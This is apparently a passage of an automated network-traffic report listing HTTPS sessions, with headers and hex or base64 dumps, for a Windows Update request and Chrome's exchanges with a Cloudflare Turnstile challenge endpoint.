                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: q3Y1bS9t6W5vsjpqdjNpdnJ7KjP69/ewPC0ubrDtdrH3czZ4cLOztTX/eLFCQ4IB8HJDAzpFAzk4u3i9hwU3fj3DvL6GvXx7h4C9x/46f4bAiguLBwrNQsXJgUM+ysfP0EcDwwXOgT4ST0AJBkMJiFGRA8jRz4qIRMPNCckVD4WPFc6YyAyPWhfOj5bTGlHNz5ZO11HRi9yYUk2UVozaFY2ST9aQlZWgnVGYHhjW117Z1FEh4dUjWONlIOLa4uV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:14 UTC1369INData Raw: 43 79 73 39 2b 6d 70 4e 2f 62 71 4f 50 67 7a 2b 76 76 79 4b 76 31 77 2b 2f 6f 73 73 53 30 79 4f 75 31 41 64 58 70 2f 63 2f 34 7a 76 58 58 34 39 34 49 78 4f 67 4e 34 66 33 4b 45 74 6f 42 45 64 4d 58 36 2f 48 58 46 66 66 75 39 2f 50 61 38 65 48 67 45 42 4c 64 41 66 41 54 43 41 51 6e 48 2b 77 4c 41 77 37 38 4d 69 6f 57 41 6a 58 32 47 76 49 75 4b 2f 59 7a 42 78 59 42 51 51 4e 46 47 41 46 43 42 6a 4e 49 52 6a 6b 36 43 43 51 35 4a 6b 73 6c 51 53 4a 47 46 69 55 34 54 69 73 71 4a 56 45 77 48 53 6f 32 57 68 35 59 52 6b 67 6f 4e 30 46 69 57 30 64 67 53 69 39 45 4c 6d 6f 6d 63 6d 34 75 61 44 4d 36 4c 58 31 38 54 6c 68 50 58 6a 68 72 62 30 35 6e 66 6e 5a 47 57 6e 35 56 58 6c 74 6f 57 45 31 77 58 6f 52 4e 63 47 65 49 67 6f 2b 50 57 45 39 32 6c 5a 6d 52 67 5a 74 34 6d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Cys9+mpN/bqOPgz+vvyKv1w+/ossS0yOu1AdXp/c/4zvXX494IxOgN4f3KEtoBEdMX6/HXFffu9/Pa8eHgEBLdAfATCAQnH+wLAw78MioWAjX2GvIuK/YzBxYBQQNFGAFCBjNIRjk6CCQ5JkslQSJGFiU4TisqJVEwHSo2Wh5YRkgoN0FiW0dgSi9ELmomcm4uaDM6LX18TlhPXjhrb05nfnZGWn5VXltoWE1wXoRNcGeIgo+PWE92lZmRgZt4m
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:14 UTC1369INData Raw: 2b 76 75 48 64 71 63 7a 49 37 74 37 4c 79 39 6a 49 79 38 2f 56 33 4d 37 55 79 64 4c 4e 32 51 49 43 2f 74 54 33 2f 74 2f 53 35 4e 6b 4a 32 39 66 6d 41 38 34 4e 46 66 58 4f 42 64 44 76 35 68 63 4d 33 4e 6a 57 49 68 33 61 48 51 54 7a 48 2b 62 2b 45 69 76 6e 2f 67 44 38 42 66 67 44 4a 76 4d 51 43 43 55 6d 4f 42 67 71 44 69 72 7a 39 68 77 57 46 42 6f 66 50 7a 5a 45 4f 77 67 33 4b 53 67 6d 49 42 6f 62 54 69 35 44 4d 77 77 71 53 79 55 73 52 31 6b 79 44 7a 5a 4b 4e 55 78 55 56 45 46 59 59 6c 52 56 4b 44 59 30 4b 6d 59 38 62 47 56 44 55 47 4e 49 51 45 35 67 56 32 78 6a 4f 31 63 31 66 32 6c 58 50 31 78 4d 55 6e 39 77 56 58 6c 34 5a 57 42 44 65 57 42 4f 54 6b 78 69 59 30 71 53 59 47 69 48 55 70 42 6b 61 34 69 57 62 49 36 61 66 48 36 58 67 6e 36 51 6e 6e 56 31 6e 48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: +vuHdqczI7t7Ly9jIy8/V3M7UydLN2QIC/tT3/t/S5NkJ29fmA84NFfXOBdDv5hcM3NjWIh3aHQTzH+b+Eivn/gD8BfgDJvMQCCUmOBgqDirz9hwWFBofPzZEOwg3KSgmIBobTi5DMwwqSyUsR1kyDzZKNUxUVEFYYlRVKDY0KmY8bGVDUGNIQE5gV2xjO1c1f2lXP1xMUn9wVXl4ZWBDeWBOTkxiY0qSYGiHUpBka4iWbI6afH6Xgn6QnnV1nH
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:14 UTC1369INData Raw: 35 66 4c 32 7a 72 47 75 78 4f 69 31 39 2f 76 38 36 76 69 2b 36 76 7a 61 30 39 41 46 43 51 76 46 43 4f 6a 4b 33 41 6a 51 33 4f 48 65 37 78 59 44 46 41 54 34 35 75 2f 4f 38 53 44 62 41 4f 41 43 44 69 51 58 34 42 37 37 4b 75 6e 36 42 53 37 72 4b 76 30 79 45 2f 34 73 4c 2f 37 75 49 79 67 58 43 52 49 59 4c 7a 73 4e 4d 67 38 5a 4a 67 41 51 4d 51 51 64 48 43 51 47 4c 54 67 51 4b 52 45 51 4a 6c 52 50 51 68 64 42 54 77 31 55 4f 6c 67 63 53 31 56 69 51 79 30 6a 4e 47 64 62 53 6c 31 62 4a 47 52 48 51 46 77 71 58 30 31 42 50 30 34 30 4d 7a 55 32 4d 56 42 32 66 33 30 2b 65 45 42 61 65 58 39 54 62 30 64 46 64 32 68 59 58 6e 6c 71 59 57 6c 6e 58 34 74 6c 61 49 35 58 6c 6d 2b 45 6d 5a 35 57 57 59 43 53 58 57 43 51 6d 36 61 53 5a 71 46 6c 69 70 31 74 71 6f 4f 71 6d 70 47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 5fL2zrGuxOi19/v86vi+6vza09AFCQvFCOjK3AjQ3OHe7xYDFAT45u/O8SDbAOACDiQX4B77Kun6BS7rKv0yE/4sL/7uIygXCRIYLzsNMg8ZJgAQMQQdHCQGLTgQKREQJlRPQhdBTw1UOlgcS1ViQy0jNGdbSl1bJGRHQFwqX01BP040MzU2MVB2f30+eEBaeX9Tb0dFd2hYXnlqYWlnX4tlaI5Xlm+EmZ5WWYCSXWCQm6aSZqFlip1tqoOqmpG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:14 UTC1369INData Raw: 4f 6e 38 36 37 33 35 38 63 6e 66 34 62 2f 79 32 75 54 64 78 4e 4c 32 31 75 76 4e 78 41 4c 37 7a 77 33 52 36 64 44 6e 44 2b 63 45 35 74 73 53 35 39 7a 33 2b 39 66 68 38 41 34 62 33 66 66 6f 48 68 4d 47 39 68 59 4b 44 43 59 4b 4d 43 49 77 4b 43 67 57 44 69 30 56 4e 43 6f 71 48 44 77 38 48 78 6f 78 49 52 52 43 4e 6a 51 58 4a 52 77 69 47 68 6b 6b 48 78 30 62 44 69 52 56 52 6b 59 32 4b 6b 6b 54 4e 53 35 64 51 44 55 74 54 53 4d 2f 5a 57 59 6d 4e 7a 67 30 53 46 30 35 53 44 68 69 4f 32 46 79 53 6e 64 33 52 30 68 4b 4f 6e 5a 77 66 57 35 75 64 45 31 7a 55 31 78 58 58 49 46 59 57 6b 74 72 67 45 6d 4c 59 33 39 4e 6a 55 36 44 55 6f 47 42 61 5a 6d 62 65 33 70 61 69 33 4f 52 58 58 6c 33 65 6d 47 54 66 33 64 6a 64 58 69 48 66 71 2b 41 6f 48 32 64 6e 71 5a 77 6f 6e 4b 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: On867358cnf4b/y2uTdxNL21uvNxAL7zw3R6dDnD+cE5tsS59z3+9fh8A4b3ffoHhMG9hYKDCYKMCIwKCgWDi0VNCoqHDw8HxoxIRRCNjQXJRwiGhkkHx0bDiRVRkY2KkkTNS5dQDUtTSM/ZWYmNzg0SF05SDhiO2FySnd3R0hKOnZwfW5udE1zU1xXXIFYWktrgEmLY39NjU6DUoGBaZmbe3pai3ORXXl3emGTf3djdXiHfq+AoH2dnqZwonKl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:14 UTC1369INData Raw: 79 38 2f 62 6e 6a 76 51 50 69 39 63 45 47 39 50 6f 4f 77 4e 34 43 7a 41 2f 65 43 4e 44 73 36 67 76 55 32 67 6e 76 32 41 6f 4e 45 39 76 55 2f 68 6a 67 2f 50 59 59 34 79 55 70 47 2b 6b 62 2f 69 4c 73 43 43 45 68 37 2f 59 6c 4a 6a 72 73 42 79 6e 33 38 42 4d 66 2b 66 51 62 4d 67 42 42 52 54 77 45 2f 43 63 38 43 54 73 6a 51 41 34 6f 51 53 67 51 55 79 39 49 46 6b 5a 4a 50 42 68 61 53 55 41 65 4e 32 46 52 48 6d 4d 33 57 53 51 64 52 30 77 70 52 46 31 51 63 69 56 44 59 54 4a 6a 52 32 59 32 55 47 6c 73 4f 44 46 66 56 44 31 76 59 33 46 42 52 33 56 6f 51 6b 74 4b 65 6b 6c 6a 6a 58 39 4e 66 32 74 30 55 59 4e 6e 69 46 57 57 69 59 71 65 55 57 75 41 58 58 6c 33 6b 31 36 69 58 70 70 6b 61 32 71 41 61 57 39 6d 6f 47 32 66 67 36 52 78 61 5a 4f 72 64 58 71 35 72 48 71 72 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: y8/bnjvQPi9cEG9PoOwN4CzA/eCNDs6gvU2gnv2AoNE9vU/hjg/PYY4yUpG+kb/iLsCCEh7/YlJjrsByn38BMf+fQbMgBBRTwE/Cc8CTsjQA4oQSgQUy9IFkZJPBhaSUAeN2FRHmM3WSQdR0wpRF1QciVDYTJjR2Y2UGlsODFfVD1vY3FBR3VoQktKekljjX9Nf2t0UYNniFWWiYqeUWuAXXl3k16iXppka2qAaW9moG2fg6RxaZOrdXq5rHqrl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:14 UTC1369INData Raw: 46 32 4d 58 32 34 76 66 48 2b 66 6a 35 79 73 54 71 34 68 62 72 31 51 6e 4c 46 68 55 5a 31 75 66 37 39 50 45 4e 45 53 58 65 49 74 30 4a 36 43 59 6d 44 69 38 48 4b 67 76 38 44 41 77 6d 2f 76 59 70 4f 54 6f 51 4e 53 6e 35 4b 53 41 68 45 78 76 2b 4e 45 66 38 49 7a 45 4a 49 6a 30 36 41 45 6c 4e 52 67 74 51 48 78 41 51 56 46 45 73 46 6c 5a 56 57 78 41 31 4c 78 35 69 46 56 6c 4e 4a 54 35 5a 56 78 78 6c 61 57 4d 6e 62 44 73 73 4c 53 6c 74 53 44 4d 33 63 58 63 73 55 55 38 36 66 6a 46 35 61 55 46 61 64 58 67 34 67 59 57 45 51 34 68 58 53 45 70 6d 69 58 46 66 61 35 4b 45 6c 55 31 33 67 56 52 62 6a 5a 42 5a 58 31 70 5a 57 33 71 44 64 61 5a 37 69 49 6c 37 67 32 65 63 72 32 47 78 6d 58 4b 65 6f 6f 4f 44 6f 61 57 6c 64 71 5a 32 64 62 32 76 6e 4a 65 53 72 58 70 37 66 37
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: F2MX24vfH+fj5ysTq4hbr1QnLFhUZ1uf79PENESXeIt0J6CYmDi8HKgv8DAwm/vYpOToQNSn5KSAhExv+NEf8IzEJIj06AElNRgtQHxAQVFEsFlZVWxA1Lx5iFVlNJT5ZVxxlaWMnbDssLSltSDM3cXcsUU86fjF5aUFadXg4gYWEQ4hXSEpmiXFfa5KElU13gVRbjZBZX1pZW3qDdaZ7iIl7g2ecr2GxmXKeooODoaWldqZ2db2vnJeSrXp7f7


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              28192.168.2.44977320.109.210.53443
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:15 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=A7bblgK8nv1Tko7&MD=oSn5uoTn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:15 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MS-CorrelationId: 5742f048-8683-4309-b86b-be596b4b7d6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MS-RequestId: 7a596b03-4b94-47d7-b95c-75c861dfc679
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MS-CV: fb/6coqFvUOCGouT.0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 24490
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:15 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:15 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              29192.168.2.449778104.18.94.414431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:15 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2026836972:1728411327:0J2ljC7SPOhv7bDpKXPkeCVvQYtqToQCpwF-xLifL5A/8cf87240ceda19cb/6c598c69372390f HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:16 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cf-chl-out: ui3cF3aC48l4UQ/LuAKE/xCHqG+WwfpGVys=$FQLQdp0tD7JM+MiC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf8727ade6641d3-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:16 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: invalid


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              30192.168.2.451045104.18.95.414431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:28 UTC927OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2026836972:1728411327:0J2ljC7SPOhv7bDpKXPkeCVvQYtqToQCpwF-xLifL5A/8cf87240ceda19cb/6c598c69372390f HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 34364
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-Challenge: 6c598c69372390f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iyj2o/0x4AAAAAAAkfyuN_fqTRgfZH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:28 UTC16384OUTData Raw: 76 5f 38 63 66 38 37 32 34 30 63 65 64 61 31 39 63 62 3d 77 61 4c 47 71 38 54 2d 6d 51 6c 54 6d 54 51 54 38 54 58 69 62 37 51 54 5a 69 39 69 41 45 46 30 51 69 39 69 79 47 70 51 69 6e 69 6a 25 32 62 33 7a 54 33 63 69 79 46 51 31 54 75 51 69 70 4f 69 70 36 44 69 4d 69 33 4c 69 42 69 38 65 6c 69 4d 47 37 77 4e 49 51 77 67 61 54 32 69 38 61 54 37 33 58 71 4d 31 69 56 47 54 43 6b 69 43 6b 4f 47 69 33 69 70 6a 55 75 50 6d 43 59 73 6d 37 7a 68 6d 24 57 65 62 41 24 37 69 69 70 68 69 70 31 46 34 68 46 69 53 37 46 69 76 4a 46 54 76 46 56 38 59 50 6b 6a 2b 47 54 77 24 56 4a 57 4c 6f 63 61 69 38 45 24 2b 34 67 30 24 4a 64 6d 69 6c 5a 61 69 75 78 58 6b 4a 30 7a 69 54 2b 54 30 67 45 7a 61 64 47 69 32 67 55 6d 59 63 4a 57 38 7a 6e 68 64 68 36 4e 59 37 6b 44 64 36 72 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: v_8cf87240ceda19cb=waLGq8T-mQlTmTQT8TXib7QTZi9iAEF0Qi9iyGpQinij%2b3zT3ciyFQ1TuQipOip6DiMi3LiBi8eliMG7wNIQwgaT2i8aT73XqM1iVGTCkiCkOGi3ipjUuPmCYsm7zhm$WebA$7iiphip1F4hFiS7FivJFTvFV8YPkj+GTw$VJWLocai8E$+4g0$JdmilZaiuxXkJ0ziT+T0gEzadGi2gUmYcJW8znhdh6NY7kDd6re
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:28 UTC16384OUTData Raw: 33 71 75 76 6d 51 51 30 75 54 56 46 69 69 49 78 61 38 34 75 6f 61 77 2b 49 33 6f 69 38 54 69 76 69 38 2b 30 42 44 59 61 38 66 4f 65 4c 41 47 58 48 53 50 4b 30 6d 54 61 69 47 69 66 69 56 47 30 6d 69 73 69 76 47 38 38 69 6e 38 35 4c 54 73 69 43 69 69 41 54 4a 65 45 67 4e 4c 69 2d 69 5a 69 33 2b 54 38 69 6c 47 58 4c 69 70 4c 38 47 38 6d 30 4e 69 73 47 77 2b 69 6f 69 4b 47 33 4a 30 4f 75 24 47 77 6c 38 78 69 74 47 77 2b 54 38 51 4d 24 33 55 38 75 69 4f 38 7a 66 69 35 69 50 2b 56 6d 38 4d 47 71 5a 73 47 30 6d 46 4a 69 37 34 32 31 69 2d 69 69 58 4f 53 47 71 5a 73 37 38 35 54 51 56 4c 61 4f 42 2b 41 47 76 6b 38 6b 54 61 41 77 2b 69 5a 69 44 56 47 41 38 41 46 35 47 75 4c 33 51 69 74 69 63 76 53 38 69 71 6d 38 59 30 6b 54 4a 66 76 53 6f 4d 47 78 47 50 4c 33 38 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 3quvmQQ0uTVFiiIxa84uoaw+I3oi8Tivi8+0BDYa8fOeLAGXHSPK0mTaiGifiVG0misivG88in85LTsiCiiATJeEgNLi-iZi3+T8ilGXLipL8G8m0NisGw+ioiKG3J0Ou$Gwl8xitGw+T8QM$3U8uiO8zfi5iP+Vm8MGqZsG0mFJi7421i-iiXOSGqZs785TQVLaOB+AGvk8kTaAw+iZiDVGA8AF5GuL3QiticvS8iqm8Y0kTJfvSoMGxGPL38i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:28 UTC1596OUTData Raw: 2b 37 5a 4e 6d 24 62 68 49 32 41 70 69 75 69 4a 71 35 75 47 57 67 42 4e 54 34 33 39 31 2d 39 7a 4d 67 7a 49 4c 61 47 39 69 4e 47 63 47 63 48 38 6e 6d 79 6d 38 41 46 6d 69 63 51 54 6e 57 6a 2b 49 75 4a 4a 69 70 36 67 4c 38 4a 47 6e 69 57 41 54 4d 69 74 2b 38 44 63 44 56 78 78 41 72 63 57 47 42 4c 61 73 70 4e 37 6c 79 2b 70 54 36 36 6d 6f 46 75 33 6c 69 31 75 2d 4f 41 35 54 47 41 36 6d 69 6b 47 55 63 4e 66 4d 46 54 42 31 54 42 35 45 37 6f 79 65 64 33 47 77 6a 47 79 61 38 64 69 77 49 4c 53 61 43 76 39 72 59 53 53 42 5a 5a 72 6e 53 53 4b 4b 47 50 7a 43 64 4f 4b 6f 46 51 5a 45 49 4c 62 69 54 78 37 54 5a 67 59 33 32 64 38 69 30 65 64 68 7a 37 2b 57 32 50 4c 2d 70 69 4a 69 4a 31 55 59 6b 34 24 67 78 50 6d 32 61 31 5a 32 77 62 62 53 56 32 53 56 46 62 66 31 48 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: +7ZNm$bhI2ApiuiJq5uGWgBNT4391-9zMgzILaG9iNGcGcH8nmym8AFmicQTnWj+IuJJip6gL8JGniWATMit+8DcDVxxArcWGBLaspN7ly+pT66moFu3li1u-OA5TGA6mikGUcNfMFTB1TB5E7oyed3GwjGya8diwILSaCv9rYSSBZZrnSSKKGPzCdOKoFQZEILbiTx7TZgY32d8i0edhz7+W2PL-piJiJ1UYk4$gxPm2a1Z2wbbSV2SVFbf1Hn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:29 UTC1343INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 4476
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cf-chl-out: 5JstZZ9tHlGqTgwwn1kFvQRaeuF9lr6OoEcdh6bjQX9hWbuyLsl/xWteD+IajVN6C2386CTm3CnDXkr3spN7zlFJxu6VQ+H/aLF4u6+UGOC2qTNcRr9LLgs=$vGfr8oV9c+IWzbRA
